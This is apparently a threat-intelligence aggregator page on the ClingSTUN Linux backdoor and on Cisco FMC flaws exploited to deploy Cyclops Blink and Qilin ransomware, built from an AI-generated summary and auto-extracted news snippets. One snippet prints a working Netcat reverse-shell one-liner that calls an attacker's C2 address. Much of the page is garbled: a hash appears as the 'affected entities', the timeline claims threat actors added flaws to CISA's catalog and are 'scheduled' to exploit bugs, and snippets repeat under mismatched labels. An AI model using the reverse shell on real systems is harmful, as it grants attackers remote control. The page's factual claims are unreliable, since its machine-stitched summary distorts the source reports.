INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Hackers Abuse STUN Protocol to Install ClingSTUN Linux Backdoor
| 2026-10-05 22:44 CRITICAL HIGH EXPLOITED VULNERABILITY MALWARE & BOTNETS
Executive Summary
AI-generated
A Linux malware strain named ClingSTUN exploits unpatched vulnerabilities in Internet-facing devices to establish persistent footholds and functions as a back-connect proxy backdoor, targeting IoT devices through multiple CVEs including command injection and code execution flaws. The threat actor abuses legitimate public STUN infrastructure to discover externally mapped IP addresses, maintain NAT bindings, and improve connectivity between compromised hosts and operators. ClingSTUN maintains remote command execution capabilities and includes self-propagation exploits for seven additional vulnerabilities. As of October 5th, 2026, the affected entities include at least 99b9893064d39dd314ea691adf3281cc0aa7e0a31e5138adfb6008a2c828a9cb62342aec53006ae05a60cb8d4c41c3fa216fd727e8c6a3, with IP addresses [IOC HIDDEN • LOGIN REQUIRED] and [IOC HIDDEN • LOGIN REQUIRED] also being compromised. The attack works by exploiting vulnerabilities in various vendors' products to establish a persistent foothold on the compromised hosts, which then use legitimate public STUN infrastructure to maintain connectivity with operators.
Technical Mitigations AI-generated
• Apply the vendor fix for CVE-2026-91843, CVE-2026-20079 and treat internet-facing systems that were not patched in time as potentially compromised until verified.
• Pre-compromise (ATT&CK mitigation for Botnet): This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Technical Observables Login Required
Indicators of Compromise (IoCs) Protected
Raw threat telemetry, malicious IP addresses, file hashes, and direct VirusTotal correlation are restricted to authenticated users.
9391c6••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
90d738••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
dfba60••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
b037f4••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
li•••••.tmp
ww•••••.com
cm•••••.jar
om•••••.pl
so•••••.py
222.223.•••.•••
118.45.•••.•••
118.145.•••.•••
83.211.•••.•••
d8352c••••••••••••••••••••••••••••••••••
3b0ac6••••••••••••••••••••••••••••••••••
08636d••••••••••••••••••••••••••••••••••
945649••••••••••••••••••••••••••••••••••
hxxp://••••••••••••••••••••
85d9be••••••••••••••••••••••••••
26cec4••••••••••••••••••••••••••
89b400••••••••••••••••••••••••••
852633••••••••••••••••••••••••••
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
Star BlizzardStar Blizzard
NotPetyaNotPetyaQilinQilinCyclops BlinkCyclops Blink
CVE-2026-91843CVE-2026-91843
CVE-2026-20079CVE-2026-20079
CVE-2026-20212CVE-2026-20212
CVE-2026-85103CVE-2026-85103
CVE-2026-73456CVE-2026-73456
CVE-2026-20293CVE-2026-20293
CVE-2026-76460CVE-2026-76460
CVE-2026-85102CVE-2026-85102
CVE-2026-83548CVE-2026-83548
CVE-2026-33197CVE-2026-33197
CVE-2026-6485CVE-2026-6485
CVE-2026-73453CVE-2026-73453
CVE-2026-31431CVE-2026-31431
CVE-2026-20316CVE-2026-20316
CVE-2021-35394CVE-2021-35394
CVE-2026-83549CVE-2026-83549
Target & Sectors
NORTH_AMERICA
NORTH_AMERICA
energyenergy
governmentgovernment
Incident Timeline
late July 2026
Threat actors added CVE-2026-20316 to the KEV catalog in late July 2026.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-20316
The second vulnerability, CVE-2026-20316, was
added
to the KEV catalog in late July 2026.
organisation
KEV
The second vulnerability, CVE-2026-20316, was
added
to the KEV catalog in late July 2026.
July 29
BleepingComputer previously reported on July 29 that Cisco had updated the CVE-2026-20079 advisory with hot fixes and indicators of compromise.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-20079
However,
BleepingComputer previously reported
on July 29 that Cisco had already updated the CVE-2026-20079 advisory with hot fixes and indicators of compromise that were also associated with attacks exploiting another FMC vulnerability, CVE-2026-20316.
vulnerability
CVE-2026-20316
However,
BleepingComputer previously reported
on July 29 that Cisco had already updated the CVE-2026-20079 advisory with hot fixes and indicators of compromise that were also associated with attacks exploiting another FMC vulnerability, CVE-2026-20316.
organisation
BleepingComputer
However,
BleepingComputer previously reported
on July 29 that Cisco had already updated the CVE-2026-20079 advisory with hot fixes and indicators of compromise that were also associated with attacks exploiting another FMC vulnerability, CVE-2026-20316.
September 2
CISA added both vulnerabilities to its KEV catalog on September 2, which SonicWall has since confirmed are being exploited in attacks.
Click on any entity below to view its context and source!
attribution
KEV
CISA added both vulnerabilities to its KEV catalog on September 2, and SonicWall has confirmed they are being exploited in attacks.
attribution
CISA
CISA added both vulnerabilities to its KEV catalog on September 2, and SonicWall has confirmed they are being exploited in attacks.
attribution
SonicWall
CISA added both vulnerabilities to its KEV catalog on September 2, and SonicWall has confirmed they are being exploited in attacks.
2026/09/07
Threat actors exploited 24 IoT vulnerabilities to install a ClingSTUN Linux backdoor, prompting Cisco to release hotfixes and advise affected organizations to apply them immediately.
Click on any entity below to view its context and source!
industry
Technology
Cisco released hotfixes for both bugs last week and "strongly advised" organizations using the affected technology to apply them immediately, citing evidence of exploit activity in the world.
September 9
Threat actors exploited 24 IoT vulnerabilities to install a ClingSTUN Linux backdoor, with Cisco and Arista confirming the attacks on September 9.
Click on any entity below to view its context and source!
tactic
Remote Code Execution
Arista
published 34 security advisories
on September 9, including two maximum-severity vulnerabilities that can allow unauthenticated remote code execution on EOS systems.
organisation
EOS
Arista
published 34 security advisories
on September 9, including two maximum-severity vulnerabilities that can allow unauthenticated remote code execution on EOS systems.
general_metric
34 security advisories
Arista
published 34 security advisories
on September 9, including two maximum-severity vulnerabilities that can allow unauthenticated remote code execution on EOS systems.
organisation
Product Security Incident Response Team
Cisco
confirmed on September 9
that the vulnerability was being actively exploited, updating its advisory to say its Product Security Incident Response Team became aware of the attacks in August.
Sep 11, 2026
Threat actors exploited 24 known IoT vulnerabilities to install a ClingSTUN Linux backdoor.
September 12, 2026
Threat actors exploited 24 IoT vulnerabilities to install a ClingSTUN Linux backdoor, which was subsequently added to the U.S. Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities catalog.
Click on any entity below to view its context and source!
tactic
T1588.006 - Vulnerabilities
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
KEV
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
vulnerability
CVE-2026-20079
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
Known Exploited
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
Federal Civilian Executive Branch
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
FCEB
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
Week of September 14th
Threat actors are scheduled to exploit 24 IoT vulnerabilities, including those addressed in a forthcoming hardening release, starting the week of September 14th.
September 16
Threat actors exploited 30 vulnerabilities in Cisco's Internet Security Engine (ISE) and Firepower Management Center (FMC) products on September 16.
Week of September 16th
Threat actors are scheduled to exploit 24 IoT vulnerabilities, including those addressed in a forthcoming hardening release, starting the week of September 16th.
October 5, 2026
Threat actors exploited 24 known IoT vulnerabilities to install a ClingSTUN Linux backdoor on affected devices.
Monday, October 5, 2026
Hackread.com shared a report about hackers exploiting approximately 24 IoT vulnerabilities to install a ClingSTUN Linux backdoor, which occurred on Monday, October 5, 2026.
Click on any entity below to view its context and source!
organisation
Hackread.com
According to the company’s
report
shared with Hackread.com ahead of publication on Monday, October 5, 2026, attackers behind the campaign exploited about two dozen vulnerabilities affecting products from:
Between August 25 and September 17
Threat actors exploited 24 IoT vulnerabilities to install a ClingSTUN Linux backdoor between August 25 and September 17.
Click on any entity below to view its context and source!
general_metric
158 new security advisories
Between August 25 and September 17, InfraTrust tracked 158 new security advisories across 17 vendors, covering 1,699 vulnerabilities.
general_metric
17 vendors
Between August 25 and September 17, InfraTrust tracked 158 new security advisories across 17 vendors, covering 1,699 vulnerabilities.
general_metric
1,699 vulnerabilities
Between August 25 and September 17, InfraTrust tracked 158 new security advisories across 17 vendors, covering 1,699 vulnerabilities.
2026/10/05
Threat actors used ClingSTUN Linux backdoor to exploit dozens of vulnerabilities in Internet-facing infrastructure, including Cisco Secure Firewall Management Center (FMC) flaws and STUN protocol abuses.
Click on any entity below to view its context and source!
organisation
IoT
A sophisticated IoT botnet dubbed Cling has been discovered exploiting vulnerable internet-exposed devices through CVE-2021-35394 and other command-injection flaws.
This allows the campaign to target different types of Linux-based IoT and networking equipment.
The campaign targets IoT devices through multiple CVEs including command injection and code execution flaws in various vendors' products.
organisation
IP
The botnet operator uses IP spoofing to make commands appear as if originating from Google's STUN infrastructure.
ClingSTUN abuses legitimate public STUN infrastructure to discover externally mapped IP addresses, maintain NAT bindings, and improve connectivity between compromised hosts and operators.
“A notable feature is its abuse of legitimate public STUN servers to discover external IP addresses and port mappings, thereby helping maintain NAT connectivity.
The malicious file consisted of commands to run on the system to conduct extensive reconnaissance in the victim organization’s environment:
Host names, IP addresses, directory listings
Active Directory (AD) service-accounts credentials, MySQL account credentials
Domain account information exfiltration
Computer object lists
Hostname to IP mappings spanning domain controllers, ADFS, exchanges, fil…
infrastructure
Linux
ClingSTUN Linux Backdoor Abuses Public STUN Infrastructure.
A Linux malware strain named ClingSTUN exploits unpatched vulnerabilities in Internet-facing devices to establish persistent footholds and functions as a back-connect proxy backdoor.
Linux Backdoor Abuses STUN Protocol, Exploits Dozens of Flaws.
A recently discovered Linux backdoor turns infected systems into proxies that use the Session Traversal Utilities for NAT (STUN) protocol and contains exploits for self-propagation, FortiGuard Labs reports.
Hackers Exploit 24 IoT Vulnerabilities to Install ClingSTUN Linux Backdoor.
FortiGuard Labs has identified a
Linux backdoor
that exploits known vulnerabilities in internet-facing devices and converts infected systems into remotely controlled proxy nodes.
This allows the campaign to target different types of Linux-based IoT and networking equipment.
InfraTrust found that CVE-2026-31431, a Linux kernel privilege escalation vulnerability
dubbed "CopyFail"
and added to CISA's KEV catalog in May, now appears in 19 separate security advisories from six vendors.
Sophos Counter Threat Unit also analyzed a Linux implant named "timezone_check" recovered from compromised FMC appliances and identified it as a variant of Cyclops Blink, malware previously associated with the Sandworm threat group.
One Linux flaw spreads across 19 advisories
The September report also shows how supply-chain vulnerabilities in third-party components can create patching headaches across infrastructure products.
These changes potentially make Cyclops Blink compatible with a broader range of Linux-based network appliances and give attackers a more powerful platform for reconnaissance and intelligence collection, Sophos said.
The most significant change is that the malware now runs on 64-bit x86-64 Linux systems rather than the older 32-bit PowerPC architecture used by the original version.
It also uses generic Linux persistence techniques instead of modifying vendor-specific firmware.
organisation
STUN
A recently discovered Linux backdoor turns infected systems into proxies that use the Session Traversal Utilities for NAT (STUN) protocol and contains exploits for self-propagation, FortiGuard Labs reports.
ClingSTUN abuses legitimate public STUN infrastructure to discover externally mapped IP addresses, maintain NAT bindings, and improve connectivity between compromised hosts and operators.
The malware distinguishes itself by abusing STUN protocol traffic and public STUN infrastructure for command-and-control communications, making malicious activity appear as legitimate NAT-traversal behavior.
Named ClingSTUN, the malware supports remote command execution, maintains access after a reboot and uses legitimate public STUN servers to communicate through network address translation.
organisation
NAT
A recently discovered Linux backdoor turns infected systems into proxies that use the Session Traversal Utilities for NAT (STUN) protocol and contains exploits for self-propagation, FortiGuard Labs reports.
ClingSTUN abuses legitimate public STUN infrastructure to discover externally mapped IP addresses, maintain NAT bindings, and improve connectivity between compromised hosts and operators.
The malware distinguishes itself by abusing STUN protocol traffic and public STUN infrastructure for command-and-control communications, making malicious activity appear as legitimate NAT-traversal behavior.
STUN, short for Session Traversal Utilities for NAT, is commonly used by services such as VoIP and WebRTC to determine a device’s public IP address and port mapping.
organisation
Hackers Exploit
Hackers Exploit 24 IoT Vulnerabilities to Install ClingSTUN Linux Backdoor.
organisation
Install ClingSTUN Linux Backdoor
Hackers Exploit 24 IoT Vulnerabilities to Install ClingSTUN Linux Backdoor.
organisation
Sophos Counter Threat Unit
Sophos Counter Threat Unit also analyzed a Linux implant named "timezone_check" recovered from compromised FMC appliances and identified it as a variant of Cyclops Blink, malware previously associated with the Sandworm threat group.
organisation
Sandworm
Sophos Counter Threat Unit also analyzed a Linux implant named "timezone_check" recovered from compromised FMC appliances and identified it as a variant of Cyclops Blink, malware previously associated with the Sandworm threat group.
The second intrusion cluster, which we attribute to UAT-11823, consisted of the exploitation of CVE-2026-20079 and CVE-2026-20316, leading to the deployment of a Netcat-based reverse shell and proxy tooling, ultimately leading to the deployment of a variant of the
Cyclops Blink
malware, previously attributed to the Russian APT
Sandworm by the United States and United Kingdom
.
Related:
Maximum Severity GitLab Flaw Puts Supply Chains at Risk
Threat actors possibly tied to Sandworm are chaining the two flaws to first download a Netcat-based reverse shell and proxy tool on vulnerable FMC systems and then use that to deploy the new Cyclops Blink variant.
organisation
TCP
Capabilities include propagation scanning, DDoS flooding, TCP tunneling and proxy relay functions.
CVE-2026-73453 affects the P4Runtime service on TCP port 9559, while CVE-2026-73456 affects gNPSI.
organisation
CVE-2026-73453
CVE-2026-73453 affects the P4Runtime service on TCP port 9559, while CVE-2026-73456 affects gNPSI.
organisation
Google
A STUNning Disguise: Cling Malware Masquerades as Google.
organisation
China Mobile
Additionally, the backdoor includes a self-propagation mechanism containing hardcoded exploits for seven China Mobile, KGUARD, Linksys, LB-LINK, MVPower, Realtek, and TBK vulnerabilities.
Those flaws affect products from:
China Mobile
KGUARD
Linksys
LB-LINK
MVPower
Realtek
TBK
Downloaders recovered during the investigation could install ClingSTUN on several processor architectures, including AMD x86-64, ARM, Intel 80386, MIPS R3000 and PowerPC.
organisation
KGUARD
Additionally, the backdoor includes a self-propagation mechanism containing hardcoded exploits for seven China Mobile, KGUARD, Linksys, LB-LINK, MVPower, Realtek, and TBK vulnerabilities.
organisation
Linksys
Additionally, the backdoor includes a self-propagation mechanism containing hardcoded exploits for seven China Mobile, KGUARD, Linksys, LB-LINK, MVPower, Realtek, and TBK vulnerabilities.
organisation
MVPower
Additionally, the backdoor includes a self-propagation mechanism containing hardcoded exploits for seven China Mobile, KGUARD, Linksys, LB-LINK, MVPower, Realtek, and TBK vulnerabilities.
organisation
Intel
Those flaws affect products from:
China Mobile
KGUARD
Linksys
LB-LINK
MVPower
Realtek
TBK
Downloaders recovered during the investigation could install ClingSTUN on several processor architectures, including AMD x86-64, ARM, Intel 80386, MIPS R3000 and PowerPC.
The ClingSTUN backdoor relies on downloaders to fetch malware payloads for different architectures, including AMD X86-64, ARM, Intel 80386, MIPS R3000, and PowerPC.
organisation
MIPS
Those flaws affect products from:
China Mobile
KGUARD
Linksys
LB-LINK
MVPower
Realtek
TBK
Downloaders recovered during the investigation could install ClingSTUN on several processor architectures, including AMD x86-64, ARM, Intel 80386, MIPS R3000 and PowerPC.
The ClingSTUN backdoor relies on downloaders to fetch malware payloads for different architectures, including AMD X86-64, ARM, Intel 80386, MIPS R3000, and PowerPC.
organisation
AMD
Those flaws affect products from:
China Mobile
KGUARD
Linksys
LB-LINK
MVPower
Realtek
TBK
Downloaders recovered during the investigation could install ClingSTUN on several processor architectures, including AMD x86-64, ARM, Intel 80386, MIPS R3000 and PowerPC.
infrastructure
Macos
Related:
macOS Users Targeted by Fake Zoom Installer Carrying CloudSyncD Backdoor
Related:
AI Agents Aimed SQL Injection at US and Canadian Government Sites
Related:
Russian APT Star Blizzard Uses ‘RedFlick’ Infection Chain in Recent Attacks
Related:
Hackers Use ChatGPT Custom GPTs in ClickFix Attacks
organisation
Fake Zoom Installer Carrying
Related:
macOS Users Targeted by Fake Zoom Installer Carrying CloudSyncD Backdoor
Related:
AI Agents Aimed SQL Injection at US and Canadian Government Sites
Related:
Russian APT Star Blizzard Uses ‘RedFlick’ Infection Chain in Recent Attacks
Related:
Hackers Use ChatGPT Custom GPTs in ClickFix Attacks
threat_actor
Star Blizzard
Related:
macOS Users Targeted by Fake Zoom Installer Carrying CloudSyncD Backdoor
Related:
AI Agents Aimed SQL Injection at US and Canadian Government Sites
Related:
Russian APT Star Blizzard Uses ‘RedFlick’ Infection Chain in Recent Attacks
Related:
Hackers Use ChatGPT Custom GPTs in ClickFix Attacks
organisation
ClickFix Attacks
Related:
macOS Users Targeted by Fake Zoom Installer Carrying CloudSyncD Backdoor
Related:
AI Agents Aimed SQL Injection at US and Canadian Government Sites
Related:
Russian APT Star Blizzard Uses ‘RedFlick’ Infection Chain in Recent Attacks
Related:
Hackers Use ChatGPT Custom GPTs in ClickFix Attacks
organisation
Firewall Management Center
A likely Russian threat actor is deploying a sophisticated malware implant capable of harvesting credentials, scanning internal networks, and capturing live traffic on compromised devices by chaining two vulnerabilities in Cisco's Firewall Management Center (FMC) technology.
organisation
Iron Viking
Sophos attributed the new Cyclops Blink campaign with high confidence to Russia-nexus actors and has moderate confidence it is associated with Sandworm, which the vendor tracks as Iron Viking.
organisation
Russian
APT
The ELF-based implant is
Cyclops Blink
, a malware family previously attributed to
Sandworm,
a
Russian
APT actor.
organisation
Ivanti
The malware’s operators were seen indiscriminately exploiting Avtech, EnGenius, D-Link, Hytec, Ivanti, Lantronix, Linear, MeiG, Realtek, Sunhillo, Tenda, and TP-Link flaws, and appear to be expanding their portfolio with other exploits as well.
Avtech
D-Link
EnGenius
Hytec
Ivanti
Lantronix
Linear
MeiG
Realtek
Sunhillo
Tenda
TP-Link
FortiGuard also found seven hardcoded exploits that ClingSTUN can use to spread to other vulnerable devices.
organisation
Avtech
The malware’s operators were seen indiscriminately exploiting Avtech, EnGenius, D-Link, Hytec, Ivanti, Lantronix, Linear, MeiG, Realtek, Sunhillo, Tenda, and TP-Link flaws, and appear to be expanding their portfolio with other exploits as well.
Avtech
D-Link
EnGenius
Hytec
Ivanti
Lantronix
Linear
MeiG
Realtek
Sunhillo
Tenda
TP-Link
FortiGuard also found seven hardcoded exploits that ClingSTUN can use to spread to other vulnerable devices.
organisation
EnGenius
The malware’s operators were seen indiscriminately exploiting Avtech, EnGenius, D-Link, Hytec, Ivanti, Lantronix, Linear, MeiG, Realtek, Sunhillo, Tenda, and TP-Link flaws, and appear to be expanding their portfolio with other exploits as well.
organisation
Linear
The malware’s operators were seen indiscriminately exploiting Avtech, EnGenius, D-Link, Hytec, Ivanti, Lantronix, Linear, MeiG, Realtek, Sunhillo, Tenda, and TP-Link flaws, and appear to be expanding their portfolio with other exploits as well.
organisation
Sunhillo
The malware’s operators were seen indiscriminately exploiting Avtech, EnGenius, D-Link, Hytec, Ivanti, Lantronix, Linear, MeiG, Realtek, Sunhillo, Tenda, and TP-Link flaws, and appear to be expanding their portfolio with other exploits as well.
organisation
EnGenius
Hytec
Avtech
D-Link
EnGenius
Hytec
Ivanti
Lantronix
Linear
MeiG
Realtek
Sunhillo
Tenda
TP-Link
FortiGuard also found seven hardcoded exploits that ClingSTUN can use to spread to other vulnerable devices.
organisation
Tenda
Avtech
D-Link
EnGenius
Hytec
Ivanti
Lantronix
Linear
MeiG
Realtek
Sunhillo
Tenda
TP-Link
FortiGuard also found seven hardcoded exploits that ClingSTUN can use to spread to other vulnerable devices.
organisation
CVE-2026
These include CVE-2026-85102, an authentication bypass that can lead to remote code execution in Remote Access and Site-to-Site VPN, and CVE-2026-85103, a memory corruption vulnerability that can also lead to remote code execution.
organisation
Remote Access and Site-to-Site VPN
These include CVE-2026-85102, an authentication bypass that can lead to remote code execution in Remote Access and Site-to-Site VPN, and CVE-2026-85103, a memory corruption vulnerability that can also lead to remote code execution.
organisation
UDP
Instead, defenders should assess STUN activity alongside suspicious process behavior, unexpected UDP connections, and recurring keepalive traffic,” FortiGuard Labs notes.
Soroko advised organizations to examine exposed devices for hidden processes, altered startup files, unexplained UDP connections and repeated STUN keepalive traffic.
organisation
Initial Access
Known Vulnerabilities Used for Initial Access
organisation
Sandworm'
'Sandworm' Chains Cisco Vulnerabilities to Deploy Cyclops Blink.
organisation
Separate Cisco FMC
Two Separate Cisco FMC Vulnerabilities
Cisco described the Cyclops Blinks activity as one of three separate campaigns involving two vulnerabilities in its Secure FMC software.
organisation
Cyclops Blinks
Two Separate Cisco FMC Vulnerabilities
Cisco described the Cyclops Blinks activity as one of three separate campaigns involving two vulnerabilities in its Secure FMC software.
organisation
Secure FMC
Two Separate Cisco FMC Vulnerabilities
Cisco described the Cyclops Blinks activity as one of three separate campaigns involving two vulnerabilities in its Secure FMC software.
organisation
FortiGuard
FortiGuard did not identify the operators, disclose the number of infected devices or name any affected organizations.
organisation
Juniper, Extreme Networks
Arista, F5, Juniper, Extreme Networks, and HPE Aruba each published an advisory affecting products that contain the vulnerable component, while Dell accounts for 14 advisories covering products including VxRail, PowerFlex, ThinOS, PowerProtect, and Networking OS10.
organisation
Dell
Arista, F5, Juniper, Extreme Networks, and HPE Aruba each published an advisory affecting products that contain the vulnerable component, while Dell accounts for 14 advisories covering products including VxRail, PowerFlex, ThinOS, PowerProtect, and Networking OS10.
organisation
PowerFlex
Arista, F5, Juniper, Extreme Networks, and HPE Aruba each published an advisory affecting products that contain the vulnerable component, while Dell accounts for 14 advisories covering products including VxRail, PowerFlex, ThinOS, PowerProtect, and Networking OS10.
organisation
PowerProtect
Arista, F5, Juniper, Extreme Networks, and HPE Aruba each published an advisory affecting products that contain the vulnerable component, while Dell accounts for 14 advisories covering products including VxRail, PowerFlex, ThinOS, PowerProtect, and Networking OS10.
organisation
Networking
Arista, F5, Juniper, Extreme Networks, and HPE Aruba each published an advisory affecting products that contain the vulnerable component, while Dell accounts for 14 advisories covering products including VxRail, PowerFlex, ThinOS, PowerProtect, and Networking OS10.
organisation
Cisco FMC Flaws Exploited
Cisco FMC Flaws Exploited to Steal Credentials and Deploy Qilin Ransomware.
organisation
FMC
Talos is further disclosing a third cluster of malicious activity on an FMC instance, attributed to UAT-11988, who we assess with high confidence is a ransomware operator.
The attacks leverage
CVE-2026-20079
(CVSS score: 10.0), an authentication bypass vulnerability in the web interface of FMC software that could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.
The second vulnerability, tracked as
CVE-2026-20316
, is a lower severity flaw with a 5.3 CVSS score that allows a remote attacker to log in with low privileges and then use other previous FMC vulnerabilities to escalate privileges.
The flaw allows an unauthenticated attacker to send crafted HTTP requests to the FMC web interface and execute scripts and commands as root on vulnerable devices.
financial
3 Cluster
Cluster #3: UAT-11988, a Qilin ransomware operator
A third cluster of activity entailed a ransomware operator (tracked as UAT-11988) logging into an FMC device with static credentials (
CVE-2026-20316
), performing extensive reconnaissance, domain enumerations, credential theft, and building a list of target endpoints within the compromised organization for encryption.
organisation
AV
Once all these preliminary actions were completed, the operator began conducting additional probes within the compromised network, deploying antivirus (AV) killers and ultimately the Qilin ransomware family.
organisation
Invoke-TheHash
Pre-ransomware actions and ransomware deployment
The threat actor conducted extensive probing of endpoints in the victim’s environment, deployed open-source tooling such as impacket, Invoke-TheHash, and custom-made AV killers — all followed by the deployment of the Qilin ransomware on selected endpoints.
organisation
CVSS
Of those advisories, 42 were rated critical, eight had a maximum CVSS score of 10.0, and 71 could be exploited remotely without authentication.
CVE-2026-20079 is a critical vulnerability with a CVSS score of 10.0.
organisation
Appliance Management Console
CVE-2026-83548 is a CVSS 10.0 unauthenticated server-side request forgery vulnerability in the Appliance Work Place interface and CVE-2026-83549 is an OS command injection vulnerability in the Appliance Management Console.
organisation
Cisco Secure Firewall Management Center
Infrastructure management systems targeted
One of the most serious vulnerabilities highlighted in the report is CVE-2026-20079, a maximum-severity Cisco Secure Firewall Management Center (FMC) authentication bypass.
Active exploitation of Cisco Secure Firewall Management Center vulnerabilities.
infrastructure
10.0
The attacks leverage
CVE-2026-20079
(CVSS score: 10.0), an authentication bypass vulnerability in the web interface of FMC software that could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.
organisation
Cisco
"Customers are strongly advised to apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316," Cisco said, adding it intends to ship a comprehensive hardening release for various internally discovered vulnerabilities next week.
organisation
Cisco’s Secure FMC
First,
CVE-2026-20079
is an authentication bypass vulnerability in unpatched instances of Cisco’s Secure FMC Software, which allows an unauthenticated, remote attacker to bypass authentications and execute scripts on impacted devices to obtain root access to the underlying operating system.
financial
1 Cluster
Cluster #1: UAT-12197
This cluster of activity involved the successful exploitation of CVE-2026-20079 and the subsequent placement of a malicious web shell in the CSM Tomcat webroot directory.
organisation
Attacker
104.218.165[.]253
UAT-11823
Attacker’s
vulnerability scanner for CVE-2026-20079.
organisation
Cisco Secure FMC
CVE-2026-20316 has a CVSS score of 5.3, however it can be used with other Cisco Secure FMC vulnerabilities to elevate privileges.
It can be paired with other Cisco Secure FMC vulnerabilities to elevate privileges.
organisation
Makeself
After obtaining access, UAT-11823 subsequently updated the “license.tmp” file on disk (using Makeself) with a malicious copy to establish a Netcat-based reverse shell to their own command-and-control (C2) server:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208[.]123[.]119[.]215 3090 >/tmp/f
organisation
Maximum Severity
Related:
Maximum Severity GitLab Flaw Puts Supply Chains at Risk
Threat actors possibly tied to Sandworm are chaining the two flaws to first download a Netcat-based reverse shell and proxy tool on vulnerable FMC systems and then use that to deploy the new Cyclops Blink variant.
organisation
WatchGuard
Cyclops Blink is malware that
first surfaced in 2022
and initially targeted WatchGuard firewalls and, later, ASUS devices.
organisation
ASUS
Cyclops Blink is malware that
first surfaced in 2022
and initially targeted WatchGuard firewalls and, later, ASUS devices.
organisation
Sophos
A Significant Upgrade for Cyclops Blink
The latest variant, according to Sophos, retains many of the original features while adding several new ones.
organisation
CPU
Related:
Threat Actor Generates 1M Personalized Fraud Emails in 3 Days
The new Cyclops Blink variant adds active network scanning and packet-capture capabilities and expands its data-collection functions to include password hashes, process command lines, CPU information, and configuration data.
organisation
Modular
Modular ELF implant: Cyclops Blink
organisation
DNS
This variant of Cyclops Blink consists of the following capabilities:
Establish persistence scripts in /etc/init.d/ that execute the implant
DNS over HTTPS (DoH) IP resolution
File administration including downloads and uploads
Credential harvesting
Arbitrary file and command execution on the compromised system
Network scanning and discovery
Packet sniffing (with option filters)
organisation
HTTPS (DoH
This variant of Cyclops Blink consists of the following capabilities:
Establish persistence scripts in /etc/init.d/ that execute the implant
DNS over HTTPS (DoH) IP resolution
File administration including downloads and uploads
Credential harvesting
Arbitrary file and command execution on the compromised system
Network scanning and discovery
Packet sniffing (with option filters)
organisation
API
One of them,
CVE-2026-76460
, is an authentication bypass in an API that allows an unauthenticated remote attacker to execute commands as root.
organisation
Cisco Nexus
InfraTrust also highlighted
CVE-2026-20212
, a critical Cisco Nexus 9000 vulnerability that can allow unauthenticated attackers to gain root code execution through two debug ports that are reachable by default on affected switches.
organisation
CVE-2026-33197
The disclosure resulted in three vulnerabilities tracked as CVE-2026-20293 for Cisco, CVE-2026-33197 for AMI Aptio-based systems, and CVE-2026-6485 for Insyde.
organisation
AMI Aptio
The disclosure resulted in three vulnerabilities tracked as CVE-2026-20293 for Cisco, CVE-2026-33197 for AMI Aptio-based systems, and CVE-2026-6485 for Insyde.
organisation
InfraTrust
InfraTrust report warns network management systems under attack.
organisation
Eclypsium
This was reported in the September edition of
Eclypsium's InfraTrust Pulse
, a monthly report tracking security advisories affecting network devices, servers, firmware, chips, and other infrastructure.
organisation
InfraTrust Pulse
This was reported in the September edition of
Eclypsium's InfraTrust Pulse
, a monthly report tracking security advisories affecting network devices, servers, firmware, chips, and other infrastructure.
organisation
Cisco Identity Services Engine
Cisco Identity Services Engine (ISE), another management platform, was also hit with multiple critical vulnerabilities.
organisation
EdgeConnect SD-WAN Orchestrator
During the September reporting period, vulnerabilities also affected HPE Fabric Composer, EdgeConnect SD-WAN Orchestrator, NVIDIA Unified Fabric Manager, Dell SmartFabric Manager, SonicWall NSM On-Prem, and Arista management interfaces.
organisation
Arista
During the September reporting period, vulnerabilities also affected HPE Fabric Composer, EdgeConnect SD-WAN Orchestrator, NVIDIA Unified Fabric Manager, Dell SmartFabric Manager, SonicWall NSM On-Prem, and Arista management interfaces.
organisation
Check Point
Check Point also disclosed three critical, remotely exploitable vulnerabilities that require no authentication.
organisation
The Dutch Nationaal Cyber Security Centrum
The Dutch Nationaal Cyber Security Centrum (NCSC)
urged admins to install security updates
, warning that exploitation was imminent.
organisation
UEFI
The vulnerability allows an attacker with access to UEFI boot settings to launch an embedded UEFI Shell that is normally blocked during startup.
organisation
Shell
The vulnerability allows an attacker with access to UEFI boot settings to launch an embedded UEFI Shell that is normally blocked during startup.
organisation
AMI
AMI, Dell, Cisco, Lenovo, and Supermicro have released or announced fixes for affected products.
organisation
Lenovo
AMI, Dell, Cisco, Lenovo, and Supermicro have released or announced fixes for affected products.
organisation
Supermicro
AMI, Dell, Cisco, Lenovo, and Supermicro have released or announced fixes for affected products.
organisation
NFL
